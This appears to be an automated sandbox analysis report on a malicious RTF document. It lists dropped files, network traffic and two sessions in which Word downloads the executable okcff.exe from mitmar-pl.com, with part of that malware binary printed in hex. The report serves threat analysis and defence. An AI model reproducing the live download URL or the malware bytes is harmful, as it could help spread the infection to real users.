                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TM4WFGYHJ2HGTOWTIN9Q.temp
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\okcff.exe
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):194560
                                                          Entropy (8bit):4.668942832070624
                                                          Encrypted:false
                                                          SSDEEP:1536:QLwio+gEPHeB9PYR0uQ7nXhMM70iOVcse5m6h:rt+gIHeB9PYRnQL6S5
                                                          MD5:E9416A322E9A796D45588BC4FB04CD45
                                                          SHA1:8D261D205C8D34A4A24B713DD6B9585647B8BDEB
                                                          SHA-256:F2DA177AFF59093ABE1D3BC7C1A769BE2701784036C398900A43725D83C9E9A9
                                                          SHA-512:9A1FF2B39DFD93D3B6EAED4685876E8BF877BD1695FDC7095B74ABEADAFBAEE785815FEB75585D31299B3D0A18B5E88890DA942D65F407171C28CAF66655C5AE
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Y................0..T..........Ns... ........@.. .......................@............@..................................s..K.......X.................... ....................................................... ............... ..H............text...TS... ...T.................. ..`.rsrc...X............V..............@..@.reloc....... ......................@..B................0s......H........B.../..........Hr...............................................0...........r...p(....(.....(......(.....*..0..Q....... ......$.8......$.E........................S...............c...........^...........7...>...2...................(...................[...........m...8.....8M... ....~_...:....& ....8......(.E........q.......^...8............io....8......./(....:8... ....8......,.....(....(.....* ....~h...9....& ....8...../(....t......8....(.....*(...... ....~....9]...&
                                                          C:\Users\user\Desktop\~$478644.doc
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):162
                                                          Entropy (8bit):2.5038355507075254
                                                          Encrypted:false
                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                          Malicious:true
                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                          Static File Info

                                                          General

                                                          File type:Rich Text Format data, unknown version
                                                          Entropy (8bit):3.602985307524326
                                                          TrID:
                                                          • Rich Text Format (5005/1) 55.56%
                                                          • Rich Text Format (4004/1) 44.44%
                                                          File name:478644.doc
                                                          File size:392070
                                                          MD5:c0f8f2fc481e9be7141d84b401edf1f7
                                                          SHA1:ab1dbe841b083ea886c9023307c0527f7bfbfff3
                                                          SHA256:4b0d21f58347c62f76445c6aa17a21dd00970f235734a1d1db4a40ee5a8b7c45
                                                          SHA512:215ace87d1af8847a40c2b8763230e1004c0c2b2f1cc842ddcb0fe73d7f2238c0fa024be82380c5135d55b5585d6d86e6619f59f36e5f43696d9bb1591784d77
                                                          SSDEEP:1536:inHYJDDDDDDDDtdLZvR0y0FC7Qqofroy41hzO9lca57hKfhdzFz76mAg5eeVhMDU:iYDDDDDDDDjoUdzFtr5RDAw5wfo
                                                          File Content Preview:{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\stshfBi31507\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

                                                          File Icon

                                                          Icon Hash:e4eea2aaa4b4b4a4

                                                          Static RTF Info

                                                          Objects

                                                          IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                          0000007CDh2embeddedpackage97076abdtfhgXgeghDp.ScTC:\nsdsTggH\abdtfhgXGeghDp.ScTC:\CbkepaD\abdtfhghgeghDp.ScTno
                                                          100031D7Ah2embeddedOLE2LInk2560no

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 14, 2022 10:23:17.968811989 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:17.995575905 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:17.995758057 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:17.996404886 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.023190022 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024344921 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024382114 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024405003 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024426937 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024430990 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.024451971 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024465084 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.024475098 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024492979 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024496078 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.024511099 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024519920 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.024549961 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.024666071 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024691105 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.024725914 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.024754047 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.032021999 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051234007 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051270008 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051295042 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051320076 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051333904 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051345110 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051366091 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051371098 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051373005 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051374912 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051398993 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051424026 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051436901 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051451921 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051457882 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051465988 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051505089 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051527977 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051553965 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051578045 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051578999 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051592112 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051635027 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051668882 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051695108 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051718950 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051729918 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051752090 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051757097 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051820993 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051853895 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051867962 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051877975 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051894903 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051903963 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.051913977 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.051945925 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.052258968 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.052330971 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.052876949 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078186035 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078212976 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078226089 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078238964 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078257084 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078288078 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078294039 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078342915 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078356981 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078391075 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078397989 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078434944 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078453064 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078470945 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078475952 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078489065 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078495026 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078510046 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078525066 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078588963 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078607082 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078624964 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078632116 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078641891 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078648090 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078661919 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078679085 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078778028 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078795910 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078814030 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078819036 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078833103 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078834057 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078851938 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078869104 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.078922987 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.078941107 CET804916737.0.9.166192.168.2.22

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 14, 2022 10:23:17.920835972 CET5216753192.168.2.228.8.8.8
                                                          Jan 14, 2022 10:23:17.952476025 CET53521678.8.8.8192.168.2.22
                                                          Jan 14, 2022 10:23:22.426112890 CET5059153192.168.2.228.8.8.8
                                                          Jan 14, 2022 10:23:22.446824074 CET53505918.8.8.8192.168.2.22
                                                          Jan 14, 2022 10:23:23.372718096 CET5780553192.168.2.228.8.8.8
                                                          Jan 14, 2022 10:23:23.440036058 CET53578058.8.8.8192.168.2.22
                                                          Jan 14, 2022 10:23:26.991931915 CET5903053192.168.2.228.8.8.8
                                                          Jan 14, 2022 10:23:27.011117935 CET53590308.8.8.8192.168.2.22

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Jan 14, 2022 10:23:17.920835972 CET192.168.2.228.8.8.80xf90Standard query (0)mitmar-pl.comA (IP address)IN (0x0001)
                                                          Jan 14, 2022 10:23:22.426112890 CET192.168.2.228.8.8.80x8b50Standard query (0)mitmar-pl.comA (IP address)IN (0x0001)
                                                          Jan 14, 2022 10:23:23.372718096 CET192.168.2.228.8.8.80x8fdeStandard query (0)mitmar-pl.comA (IP address)IN (0x0001)
                                                          Jan 14, 2022 10:23:26.991931915 CET192.168.2.228.8.8.80x11d5Standard query (0)mitmar-pl.comA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Jan 14, 2022 10:23:17.952476025 CET8.8.8.8192.168.2.220xf90No error (0)mitmar-pl.com37.0.9.166A (IP address)IN (0x0001)
                                                          Jan 14, 2022 10:23:22.446824074 CET8.8.8.8192.168.2.220x8b50No error (0)mitmar-pl.com37.0.9.166A (IP address)IN (0x0001)
                                                          Jan 14, 2022 10:23:23.440036058 CET8.8.8.8192.168.2.220x8fdeNo error (0)mitmar-pl.com37.0.9.166A (IP address)IN (0x0001)
                                                          Jan 14, 2022 10:23:27.011117935 CET8.8.8.8192.168.2.220x11d5No error (0)mitmar-pl.com37.0.9.166A (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • mitmar-pl.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.224916737.0.9.16680C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 14, 2022 10:23:17.996404886 CET0OUTGET /okcff.exe HTTP/1.1
                                                          Accept: */*
                                                          UA-CPU: AMD64
                                                          Accept-Encoding: gzip, deflate
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                          Host: mitmar-pl.com
                                                          Connection: Keep-Alive
                                                          Jan 14, 2022 10:23:18.024344921 CET2INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Fri, 14 Jan 2022 09:23:18 GMT
                                                          Content-Type: application/x-msdownload
                                                          Content-Length: 194560
                                                          Last-Modified: Fri, 14 Jan 2022 05:56:32 GMT
                                                          Connection: keep-alive
                                                          ETag: "61e11090-2f800"
                                                          Accept-Ranges: bytes
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28 17 00 00 06 28 05 00 00 0a 13 2a 20 01 00 00 00 7e 68 00 00 04 39 98 ff ff ff 26 20 01 00 00 00 38 8d ff ff ff 11 2f 28 16 00 00 06 74 04 00 00 01 13 17 38 bf ff ff ff 28 18 00 00 06 11 2a 28 12 00 00 06 13 19 20 00 00 00 00 7e 0d 00 00 04 39 5d ff ff ff 26 20 00 00 00 00 38 52 ff ff ff dd 03 03 00 00 11 2f 75 14 00 00 01 13 1a 38 16 00 00 00 fe 0c 0f 00 45 02 00 00 00 32 00 00 00 26 00 00 00 38 2d 00 00 00 11 1a 3a 1a 00 00 00 20 00 00 00 00 7e 50 00 00 04 3a d8 ff ff ff 26 20 00 00 00 00 38 cd ff ff ff 11 1a 6f
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELY0TNs @ @@sKX H.textTS T `.rsrcXV@@.reloc @B0sHB/Hr0rp((((*0Q $8$ESc^7>2([m88M ~_:& 8(Eq^8io8/(:8 8,((* ~h9& 8/(t8(*( ~9]& 8R/u8E2&8-: ~P:& 8o


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.224916837.0.9.16680C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 14, 2022 10:23:22.518182993 CET206OUTGET /okcff.exe HTTP/1.1
                                                          Host: mitmar-pl.com
                                                          Connection: Keep-Alive
                                                          Jan 14, 2022 10:23:22.545969963 CET207INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Fri, 14 Jan 2022 09:23:22 GMT
                                                          Content-Type: application/x-msdownload
                                                          Content-Length: 194560
                                                          Last-Modified: Fri, 14 Jan 2022 05:56:32 GMT
                                                          Connection: keep-alive
                                                          ETag: "61e11090-2f800"
                                                          Accept-Ranges: bytes
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 